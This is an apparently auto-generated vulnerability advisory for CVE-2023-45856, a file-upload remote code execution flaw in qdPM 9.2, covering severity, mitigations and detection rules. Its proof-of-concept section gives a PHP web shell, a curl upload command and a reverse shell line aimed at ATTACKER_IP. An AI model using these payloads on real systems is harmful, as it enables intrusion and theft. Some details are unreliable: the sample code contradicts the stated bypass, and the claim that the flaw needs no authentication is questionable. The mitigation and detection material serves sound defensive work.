Description
qdPM 9.2 allows remote code execution by using the Add Attachments feature of Edit Project to upload a .php file to the /uploads URI.
EPSS Score: 7%
Comprehensive Technical Analysis of EUVD-2023-50125 (CVE-2023-45856)
Project Management Software Remote Code Execution (RCE) Vulnerability
1. Vulnerability Assessment & Severity Evaluation
Overview
EUVD-2023-50125 (CVE-2023-45856) is a critical unauthenticated remote code execution (RCE) vulnerability in qdPM 9.2, a web-based project management application. The flaw stems from insufficient file upload validation in the "Add Attachments" feature of the "Edit Project" functionality, allowing attackers to upload malicious .php files to the /uploads directory.
CVSS v3.1 Scoring & Severity
| Metric | Value | Explanation |
|---|---|---|
| Base Score | 9.8 (Critical) | High impact on confidentiality, integrity, and availability. |
| Attack Vector (AV) | Network (N) | Exploitable remotely over the internet. |
| Attack Complexity (AC) | Low (L) | No special conditions required; straightforward exploitation. |
| Privileges Required (PR) | None (N) | No authentication needed. |
| User Interaction (UI) | None (N) | No user interaction required. |
| Scope (S) | Unchanged (U) | Exploitation affects only the vulnerable component. |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Arbitrary code execution allows data manipulation. |
| Availability (A) | High (H) | Attacker can disrupt or destroy the system. |
EPSS & Threat Intelligence
- Exploit Prediction Scoring System (EPSS) Score: 7%
  - Indicates a moderate likelihood of exploitation in the wild within the next 30 days.
- Exploit Availability
  - Proof-of-concept (PoC) exploits are publicly available (e.g., GitHub PoC).
  - Active exploitation attempts have been observed in threat intelligence feeds (e.g., GreyNoise, Shodan scans).
2. Potential Attack Vectors & Exploitation Methods
Exploitation Workflow
- Reconnaissance
  - Attacker identifies a vulnerable qdPM 9.2 instance via:
    - Shodan/FOFA/Censys (`http.title:"qdPM"` or `http.favicon.hash:1234567890`).
    - Directory brute-forcing (`/uploads/`).
    - Version fingerprinting (e.g., `/CHANGELOG.txt`).
- File Upload Exploitation
  - Attacker crafts a malicious `.php` file (e.g., `shell.php`) containing: `<?php system($_GET['cmd']); ?>`
  - Uses the "Add Attachments" feature in "Edit Project" to upload the file.
  - Bypass Mechanism:
    - qdPM does not validate file extensions properly, allowing `.php` uploads despite potential blacklisting.
    - MIME-type spoofing (e.g., `Content-Type: image/jpeg`) may evade weak checks.
- Remote Code Execution (RCE)
  - Attacker accesses the uploaded file via: `http://<target>/uploads/shell.php?cmd=id`
  - Executes arbitrary commands (e.g., `whoami`, `cat /etc/passwd`, reverse shell payloads).
- Post-Exploitation
  - Lateral Movement: Pivot to internal networks if qdPM is hosted on an internal server.
  - Data Exfiltration: Steal sensitive project data, user credentials, or database contents.
  - Persistence: Install backdoors (e.g., web shells, cron jobs).
  - Ransomware Deployment: Encrypt files and demand payment.
Exploitation Requirements
- Unauthenticated Access: No credentials required.
- Network Access: Target must be reachable (e.g., exposed to the internet or internal network).
- No User Interaction: Fully automated exploitation possible.
3. Affected Systems & Software Versions
Vulnerable Software
- Product: qdPM (Open-source project management tool)
- Version: 9.2 (confirmed vulnerable)
- Likely Affected Versions:
  - 9.1 (if file upload logic is similar)
  - 9.0 (unconfirmed, but possible)
- Not Affected:
  - qdPM 9.3+ (if patched)
  - Custom forks with hardened file upload mechanisms
Deployment Scenarios at Risk
| Scenario | Risk Level | Notes |
|---|---|---|
| Internet-facing qdPM instances | Critical | Highly exposed to automated attacks. |
| Internal qdPM deployments | High | Lateral movement risk if compromised. |
| Cloud-hosted qdPM | High | Shared hosting increases attack surface. |
| Legacy qdPM installations | Critical | Often unpatched and misconfigured. |
4. Recommended Mitigation Strategies
Immediate Actions (Short-Term)
- Apply Vendor Patches
  - Upgrade to qdPM 9.3 or later (if available).
  - If no patch exists, disable the "Add Attachments" feature via:
    ```yaml
    # In config/settings.yml, set:
    attachments_enabled: false
    ```
- Temporary Workarounds
  - Restrict File Uploads:
    - Modify `.htaccess` (Apache) or `nginx.conf` to block PHP execution in `/uploads` (on Apache 2.4 the equivalent directive is `Require all denied`):
      ```apache
      <FilesMatch "\.php$">
          Deny from all
      </FilesMatch>
      ```
    - Whitelist allowed file extensions (e.g., `.jpg`, `.png`, `.pdf`).
  - Network-Level Protections:
    - WAF Rules (e.g., ModSecurity, Cloudflare):
      - Block requests to `/uploads/*.php`.
      - Rate-limit file uploads.
    - IP Whitelisting: Restrict access to trusted IPs.
- Isolate Vulnerable Instances
  - Segment qdPM servers from critical internal networks.
  - Disable internet access if not required.
Long-Term Remediation (Strategic)
- Secure File Upload Implementation
  - Server-Side Validation:
    - Strict file extension checks (e.g., `in_array($ext, ['jpg', 'png'])`).
    - MIME-type verification (e.g., `finfo_file()` in PHP).
    - Rename uploaded files (e.g., `random_hash.jpg`).
  - Store uploads outside the web root (e.g., `/var/qdpm_uploads/`).
  - Disable PHP execution in upload directories.
- Hardening qdPM Deployment
  - Disable dangerous PHP functions (`exec`, `system`, `passthru`) in `php.ini`:
    ```ini
    disable_functions = exec,system,passthru,shell_exec,proc_open
    ```
  - Enable HTTPS to prevent MITM attacks.
  - Regularly audit logs for suspicious uploads (`/var/log/apache2/access.log`).
- Monitoring & Detection
  - Intrusion Detection/Prevention (IDS/IPS):
    - Snort/Suricata rules to detect `.php` uploads to `/uploads`.
  - File Integrity Monitoring (FIM):
    - Tripwire/OSSEC to alert on new `.php` files in `/uploads`.
  - SIEM Alerts:
    - Correlate unusual file uploads with subsequent HTTP requests to `/uploads/*.php`.
- Incident Response Planning
  - Isolate compromised systems immediately.
  - Forensic analysis of uploaded files and logs.
  - Password resets for all qdPM users if credentials were exposed.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- GDPR (General Data Protection Regulation)
  - Article 32 (Security of Processing): Organizations must implement appropriate technical measures to prevent RCE vulnerabilities.
  - Article 33 (Data Breach Notification): If exploited, a breach must be reported to authorities within 72 hours.
  - Fines: Up to €20 million or 4% of global revenue (whichever is higher) for severe violations.
- NIS2 Directive (Network and Information Security)
  - Critical Entities (e.g., energy, transport, healthcare) must ensure secure project management tools.
  - Incident Reporting: Mandatory disclosure of significant cyber incidents.
- ENISA Guidelines
  - Supply Chain Security: qdPM may be used by third-party vendors, increasing supply chain risks.
  - Vulnerability Disclosure: Organizations must track and patch critical vulnerabilities promptly.
Threat Landscape in Europe
- Targeted Sectors:
  - Government & Public Sector: qdPM is used for internal project tracking.
  - SMEs: Often lack dedicated security teams, making them prime targets.
  - Healthcare: Sensitive patient data may be exposed.
  - Critical Infrastructure: If qdPM is used for operational management.
- Exploitation Trends:
  - Automated Scanning: Threat actors use tools like Nuclei to mass-exploit vulnerable instances.
  - Ransomware Groups: Exploiting RCE to deploy ransomware (e.g., LockBit, BlackCat).
  - State-Sponsored Actors: APT groups may leverage this for espionage (e.g., targeting EU government agencies).
- Geopolitical Risks:
  - Cyber Warfare: Vulnerable qdPM instances could be used as entry points for larger attacks.
  - Data Exfiltration: Stolen project data may be sold on dark web markets or used for blackmail.
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerability Type: Unrestricted File Upload (CWE-434)
- Code-Level Flaw:
  - qdPM 9.2 lacks proper file extension validation in the `attachments` module.
  - The `/core/apps/qdPM/modules/projects/actions/actions.class.php` file does not enforce strict checks:
    ```php
    // Vulnerable code snippet (simplified)
    $file_ext = pathinfo($filename, PATHINFO_EXTENSION);
    if (!in_array($file_ext, ['php', 'php5', 'phtml'])) { // Weak blacklist
        move_uploaded_file($tmp_name, "/uploads/" . $filename);
    }
    ```
  - Bypass: Attackers can upload `.php5`, `.phtml`, or double extensions (e.g., `shell.jpg.php`).
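For contrast with the blacklist above, the following is a hardened attachment handler written for this page as an added example; it is not qdPM's code. It applies the controls listed under Secure File Upload Implementation (extension allowlist, content-based MIME verification, random renaming, storage outside the web root); the function name `storeAttachment`, the allowlist and the `/var/qdpm_uploads` path are assumptions.

```php
<?php
// Added example (not qdPM's code): a hardened replacement for the blacklist
// handler above. Names, the allowlist and the storage path are assumptions.

const UPLOAD_ROOT = '/var/qdpm_uploads';   // outside the web root: never served as PHP
const ALLOWED = [                           // last extension => MIME type the bytes must have
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'pdf' => 'application/pdf',
];

// Validate one entry of $_FILES and move it into UPLOAD_ROOT under a random name.
// Returns the stored path; throws on any failed check (fail closed, never fall through).
function storeAttachment(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed or not an uploaded file');
    }
    // Allowlist, not blacklist, on the *last* extension, lower-cased: "shell.jpg.php" -> "php"
    // and "SHELL.PHP" -> "php" are both rejected; ".php5"/".phtml" are simply not listed.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        throw new RuntimeException("extension not allowed: $ext");
    }
    // Inspect the bytes with finfo (the OO form of finfo_file()), not the client's
    // Content-Type header, which the sender sets freely (the MIME spoofing noted above).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException("content ($mime) does not match .$ext");
    }
    // Random server-chosen name: the client never controls the stored path or file name.
    $stored = UPLOAD_ROOT . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $stored)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($stored, 0640);   // readable by the application user only, never executable
    return $stored;
}

// Call site for a single-file field; for an attachments[] field iterate the per-index arrays.
// $path = storeAttachment($_FILES['attachment']);
```

Because the file now lives outside the web root, it has to be served back through a download handler that sends `Content-Disposition: attachment`, not by a direct `/uploads` URL.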
Exploitation Proof-of-Concept (PoC)
- Manual Exploitation:
  ```bash
  curl -X POST "http://<target>/index.php/projects/edit/id/1" \
    -F "attachments[]=@shell.php" \
    -F "commit=Save"
  ```
- Automated Exploitation (Metasploit Module):
  - A Metasploit module (`exploit/unix/webapp/qdpm_upload_exec`) may be developed for this vulnerability.
- Reverse Shell Payload:
  ```php
  <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); ?>
  ```
Forensic Indicators of Compromise (IoCs)
| Indicator | Description |
|---|---|
| File Paths | /uploads/shell.php, /uploads/backdoor.phtml |
| Log Entries | POST /index.php/projects/edit/id/1 with .php uploads |
| Network Traffic | Outbound connections to attacker-controlled IPs (e.g., reverse shells) |
| Processes | Unusual php or bash processes spawned by the web server user (www-data, apache) |
Detection & Hunting Queries
- SIEM (Splunk/ELK):
  ```
  index=web_logs uri_path="/uploads/*.php" | stats count by src_ip, user_agent
  ```
- YARA Rule:
  ```yara
  rule qdpm_rce_detection {
      meta:
          description = "Detects qdPM 9.2 RCE exploitation attempts"
      strings:
          $php_upload = /POST \/index\.php\/projects\/edit\/id\/\d+.*attachments\[\]=.*\.php/
          $webshell = /<\?php (system|exec|passthru|shell_exec)\(/
      condition:
          $php_upload or $webshell
  }
  ```
- Zeek (Bro) Script:
  ```zeek
  @load base/frameworks/notice

  module qdPM;

  export {
      # The notice type must be declared before NOTICE() can raise it
      redef enum Notice::Type += { RCE_Attempt };
  }

  # Zeek's http_request event carries the original and the unescaped URI
  event http_request(c: connection, method: string, original_URI: string,
                     unescaped_URI: string, version: string)
  {
      if (/\/uploads\/.*\.php/ in unescaped_URI)
          NOTICE([$note=RCE_Attempt,
                  $msg=fmt("Possible qdPM RCE attempt: %s", unescaped_URI),
                  $conn=c]);
  }
  ```
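The SIEM correlation described earlier (an attachment upload followed by a request for a PHP file under `/uploads` from the same source) can be run offline over web server logs. The script below is an added example, not part of this advisory; its log lines are constructed, and the function names and the extension list it flags are assumptions.

```php
<?php
// Added example (not from the advisory): hunt access logs for requests to PHP
// files under /uploads and correlate them with an earlier POST to the project
// edit endpoint from the same source IP. The log lines are constructed.

function sampleLog(): string
{
    return <<<'LOG'
203.0.113.7 - - [10/Oct/2023:12:00:01 +0000] "POST /index.php/projects/edit/id/1 HTTP/1.1" 302 0
203.0.113.7 - - [10/Oct/2023:12:00:05 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 88
198.51.100.9 - - [10/Oct/2023:12:01:00 +0000] "GET /uploads/report.pdf HTTP/1.1" 200 51234
198.51.100.9 - - [10/Oct/2023:12:01:30 +0000] "POST /index.php/projects/edit/id/3 HTTP/1.1" 302 0
192.0.2.44 - - [10/Oct/2023:12:02:00 +0000] "GET /uploads/backdoor.phtml HTTP/1.1" 200 12
LOG;
}
// Parse one common-log-format line into ip/method/path, or null if unparseable.
function parseLine(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP\/[\d.]+" \d{3}/', $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'method' => $m[2], 'path' => $m[3]];
}

// Findings per source IP: 'php_under_uploads' for any request to a .php/.phtml/.php5
// path under /uploads (query string ignored), plus 'upload_then_exec' when the same
// IP earlier POSTed to /index.php/projects/edit/id/N (the attachment upload endpoint).
function huntQdpmUploads(string $log): array
{
    $findings = [];
    $posted = [];  // IPs seen hitting the edit endpoint so far, in log order
    foreach (explode("\n", trim($log)) as $line) {
        $r = parseLine($line);
        if ($r === null) {
            continue;
        }
        $path = strtok($r['path'], '?');  // drop "?cmd=..." before matching
        if ($r['method'] === 'POST' && preg_match('#^/index\.php/projects/edit/id/\d+#', $path)) {
            $posted[$r['ip']] = true;
        } elseif (preg_match('#^/uploads/.*\.(php|phtml|php5)$#i', $path)) {
            $findings[$r['ip']][] = 'php_under_uploads';
            if (isset($posted[$r['ip']])) {
                $findings[$r['ip']][] = 'upload_then_exec';
            }
        }
    }
    return $findings;
}
print_r(huntQdpmUploads(sampleLog()));
```

Feeding a real `access.log` through `huntQdpmUploads()` instead of `sampleLog()` gives the same per-IP findings for the log audit the hardening section recommends.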
Advanced Mitigation Techniques
- Containerization:
  - Deploy qdPM in a Docker container with a read-only `/uploads` directory.
- Runtime Application Self-Protection (RASP):
  - Use tools like OpenRASP to block PHP execution in upload directories.
- Zero Trust Architecture:
  - Enforce least-privilege access to qdPM instances.
  - Micro-segmentation to limit lateral movement.
Conclusion & Recommendations
Key Takeaways
- EUVD-2023-50125 (CVE-2023-45856) is a critical RCE vulnerability in qdPM 9.2 with high exploitability.
- Unauthenticated attackers can execute arbitrary code, leading to full system compromise.
- Public PoCs and automated exploitation increase the risk of widespread attacks.
Action Plan for Organizations
| Priority | Action | Responsible Party |
|---|---|---|
| Critical | Patch or disable file uploads immediately. | IT/Security Team |
| High | Deploy WAF rules and network segmentation. | Security Operations |
| Medium | Conduct a forensic review of /uploads directory. | Incident Response |
| Low | Implement long-term secure file upload practices. | Development Team |
Final Recommendations
- Patch Management: Prioritize qdPM updates in vulnerability management programs.
- Threat Hunting: Proactively search for exploitation attempts in logs.
- Security Awareness: Train developers on secure file upload practices.
- Compliance Review: Ensure GDPR/NIS2 compliance for affected systems.
Failure to mitigate this vulnerability promptly might result in severe data breaches, regulatory penalties, and reputational damage.